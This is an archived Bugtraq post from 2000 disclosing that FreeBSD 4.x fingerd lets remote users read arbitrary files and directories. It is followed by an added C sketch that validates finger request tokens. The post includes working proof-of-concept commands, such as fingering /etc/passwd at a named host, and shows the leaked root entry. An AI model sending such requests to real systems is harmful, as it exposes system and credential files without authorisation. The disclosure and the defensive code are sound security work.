[17039] in bugtraq


Re: [sa2c@and.or.jp: bin/21704: enabling fingerd makes files

daemon@ATHENA.MIT.EDU (Przemyslaw Frasunek)
Wed Oct 4 02:26:31 2000

Mail-Followup-To: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>,
                  bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Message-ID:  <20001003201812.K6009@riget.scene.pl>
Date:         Tue, 3 Oct 2000 20:18:12 +0200
Reply-To: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
From: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <20001002205640.N2618@riget.scene.pl>; from
              venglin@FREEBSD.LUBLIN.PL on Mon, Oct 02, 2000 at 08:56:40PM +0200

On Mon, Oct 02, 2000 at 08:56:40PM +0200, Przemyslaw Frasunek wrote:
> If finger takes full path name as user name, it prints out contents of
> that file.  Because fingerd executes finger as local information
> provider, finger /path/to/file@some.host prints /path/to/file at
> some.host.

BTW, the problem persists only in the 4.x branch. Of course, it also
allows traversing directory structures:

riget:venglin:~> finger /etc/@lagoon | strings | head -n 3
[lagoon.freebsd.lublin.pl]
^@^@^L^@^D^A.^@^@^@^B^@^@^@^L^@^D^B..^@^@^@^W^A^@^T^@^D^Hdefaults^@^A^@^@^A
^@^@^T^@^H      protocols^@^@^@^B

riget:venglin:~> finger /etc/passwd@lagoon | head -n2
[lagoon.freebsd.lublin.pl]
root:*:0:0:Przemyslaw Frasunek:/home/root:/usr/local/bin/tcsh

--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglin@freebsd.lublin.pl ** PGP: D48684904685DF43  EA93AFA13BE170BF *
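
A defensive check for the behaviour described in this message, as an added example that is not part of the original post and is not the FreeBSD fix: a finger daemon can validate each token of the request line before handing it to the local finger program, refusing anything that is not the RFC 1288 `/W` switch or a plain login name. The function names, the 32-character limit and the policy of refusing `@host` forwarding are assumptions of this sketch.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define FINGER_MAX_NAME 32 /* assumed limit, not taken from fingerd */

/* 1 if tok[0..len) looks like a plain login name, 0 otherwise. */
static int name_token_ok(const char *tok, size_t len)
{
    size_t i;
    /* Must start with a letter, digit or '_' (so no "-opt", ".", ".."). */
    if (len == 0 || len > FINGER_MAX_NAME ||
        !(isalnum((unsigned char)tok[0]) || tok[0] == '_'))
        return 0;
    for (i = 1; i < len; i++) {
        unsigned char c = (unsigned char)tok[i];
        /* Allowlist: '/', '@' and control bytes all fall outside it. */
        if (!isalnum(c) && c != '_' && c != '-' && c != '.')
            return 0;
    }
    return 1;
}

/* 1 if every token is the "/W" switch or a plain login name, else 0.
 * An empty line (list logged-in users) is accepted. */
int finger_request_ok(const char *line)
{
    const char *p = line;
    size_t len;
    for (;;) {
        p += strspn(p, " \t\r\n");      /* skip separators and CRLF */
        len = strcspn(p, " \t\r\n");    /* length of the next token */
        if (len == 0)
            return 1;                   /* end of line, nothing refused */
        if (!(len == 2 && p[0] == '/' && (p[1] == 'W' || p[1] == 'w')) &&
            !name_token_ok(p, len))
            return 0;                   /* path-like or malformed token */
        p += len;
    }
}

int main(void)
{
    /* Constructed request lines, as a finger client would send them. */
    const char *samples[] = { "venglin\r\n", "/W venglin\r\n",
                              "/etc/passwd\r\n", "/etc/\r\n" };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%d\n", finger_request_ok(samples[i]));
    return 0;
}
```

A daemon using a check like this would drop the connection or return an error when the function returns 0, rather than executing finger with the untrusted token.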
